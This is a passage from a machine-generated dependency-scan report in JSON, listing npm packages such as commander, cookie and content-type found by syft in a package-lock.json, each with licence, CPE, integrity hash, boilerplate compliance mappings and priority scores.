"2.1.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:color-string_project:color-string:2.1.4:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/color-string@2.1.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/color-string/-/color-string-2.1.4.tgz", "integrity": "sha512-Bb6Cq8oq0IjDOe8wJmi4JeNn763Xs9cfrBcaylK1tPypWzyoy2G3l90v9k64kjphl/ZJjPIShFztenRomi8WTg==", "dependencies": { "color-name": "^2.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "227fe4ddfe5bcfb2", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: combined-stream 1.0.8", "title": "combined-stream 1.0.8", "description": "Package discovered: combined-stream 1.0.8", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "6feb2abce081a13b", "name": "combined-stream", "version": "1.0.8", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:combined-stream:combined-stream:1.0.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:combined-stream:combined_stream:1.0.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:combined_stream:combined-stream:1.0.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:combined_stream:combined_stream:1.0.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:combined:combined-stream:1.0.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:combined:combined_stream:1.0.8:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/combined-stream@1.0.8", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "dependencies": { "delayed-stream": "~1.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "df1825804c4b40ea", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: commander 10.0.1", "title": "commander 10.0.1", "description": "Package discovered: commander 10.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "68cb0d0425b8ec71", "name": "commander", "version": "10.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:commander:commander:10.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/commander@10.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/commander/-/commander-10.0.1.tgz", "integrity": "sha512-y4Mg2tXshplEbSGzx7amzPwKKOCGuoSRP/CjEdwwk0FOGlUbq6lKuoyDZTNZkmxHdJtp54hdfY/JUrdL7Xfdug==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b275a043135b9b63", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: commander 4.1.1", "title": "commander 4.1.1", "description": "Package discovered: commander 4.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "6ef23c8bf6c64c11", "name": "commander", "version": "4.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:commander:commander:4.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/commander@4.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/commander/-/commander-4.1.1.tgz", "integrity": "sha512-NOKm8xhkzAjzFx8B2v5OAHT+u5pRQc2UCa2Vq9jYL/31o2wi9mxBA7LIFs3sV5VSC49z6pEhfbMULvShKj26WA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "af21f9856150d16c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: concat-stream 1.6.2", "title": "concat-stream 1.6.2", "description": "Package discovered: concat-stream 1.6.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "ee26fc9f2aa2694f", "name": "concat-stream", "version": "1.6.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:concat-stream:concat-stream:1.6.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:concat-stream:concat_stream:1.6.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:concat_stream:concat-stream:1.6.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:concat_stream:concat_stream:1.6.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:concat:concat-stream:1.6.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:concat:concat_stream:1.6.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/concat-stream@1.6.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.2.tgz", "integrity": "sha512-27HBghJxjiZtIk3Ycvn/4kbJk/1uZuJFfuPEns6LaEvpvG1f0hTea8lilrouyo9mVc2GWdcEZ8OLoGmSADlrCw==", "dependencies": { "buffer-from": "^1.0.0", "inherits": "^2.0.3", "readable-stream": "^2.2.2", "typedarray": "^0.0.6" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "6a853859517f2ba3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: config-chain 1.1.13", "title": "config-chain 1.1.13", "description": "Package discovered: config-chain 1.1.13", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f8adcbfce494f378", "name": "config-chain", "version": "1.1.13", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:config-chain:config-chain:1.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:config-chain:config_chain:1.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:config_chain:config-chain:1.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:config_chain:config_chain:1.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:config:config-chain:1.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:config:config_chain:1.1.13:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/config-chain@1.1.13", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/config-chain/-/config-chain-1.1.13.tgz", "integrity": "sha512-qj+f8APARXHrM0hraqXYb2/bOVSV4PvJQlNZ/DVj0QrmNM2q2euizkeuVckQ57J+W0mRH6Hvi+k50M4Jul2VRQ==", "dependencies": { "ini": "^1.3.4", "proto-list": "~1.2.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "aa020ae4ab2eadc3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: content-disposition 0.5.4", "title": "content-disposition 0.5.4", "description": "Package discovered: content-disposition 0.5.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "5a8a76bf321e2afc", "name": "content-disposition", "version": "0.5.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:content-disposition:content-disposition:0.5.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:content-disposition:content_disposition:0.5.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:content_disposition:content-disposition:0.5.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:content_disposition:content_disposition:0.5.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:content:content-disposition:0.5.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:content:content_disposition:0.5.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/content-disposition@0.5.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/content-disposition/-/content-disposition-0.5.4.tgz", "integrity": "sha512-FveZTNuGw04cxlAiWbzi6zTAL/lhehaWbTtgluJh4/E95DqMwTmha3KZN1aAWA8cFIhHzMZUvLevkw5Rqk+tSQ==", "dependencies": { "safe-buffer": "5.2.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9a45820ffdb99ef9", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: content-type 1.0.5", "title": "content-type 1.0.5", "description": "Package discovered: content-type 1.0.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e6774efb67a1cd80", "name": "content-type", "version": "1.0.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:content-type:content-type:1.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:content-type:content_type:1.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:content_type:content-type:1.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:content_type:content_type:1.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:content:content-type:1.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:content:content_type:1.0.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/content-type@1.0.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/content-type/-/content-type-1.0.5.tgz", "integrity": "sha512-nTjqfcBFEipKdXCv4YDQWCfmcLZKm81ldF0pAopTvyrFGVbcR6P/VAAd5G7N+0tTr8QqiU0tFadD6FK4NtJwOA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "475f89190adc46cd", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: cookie 0.7.2", "title": "cookie 0.7.2", "description": "Package discovered: cookie 0.7.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "dabea341270367ac", "name": "cookie", "version": "0.7.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:cookie:cookie:0.7.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/cookie@0.7.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.7.2.tgz", "integrity": "sha512-yki5XnKuf750l50uGTllt6kKILY4nQ1eNIQatoXEByZ5dWgnKqbnqmTrBE5B4N7lrMJKQ2ytWMiTO2o0v6Ew/w==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "980ccdca1420305a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: cookie-signature 1.0.7", "title": "cookie-signature 1.0.7", "description": "Package discovered: cookie-signature 1.0.7", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c3cdc836e23cbee4", "name": "cookie-signature", "version": "1.0.7", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:cookie-signature_project:cookie-signature:1.0.7:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/cookie-signature@1.0.7", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.7.tgz", "integrity": "sha512-NXdYc3dLr47pBkpUCHtKSwIOQXLVn8dZEuywboCOJY/osA0wFSLlSawr3KN8qXJEyX66FcONTH8EIlVuK0yyFA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], 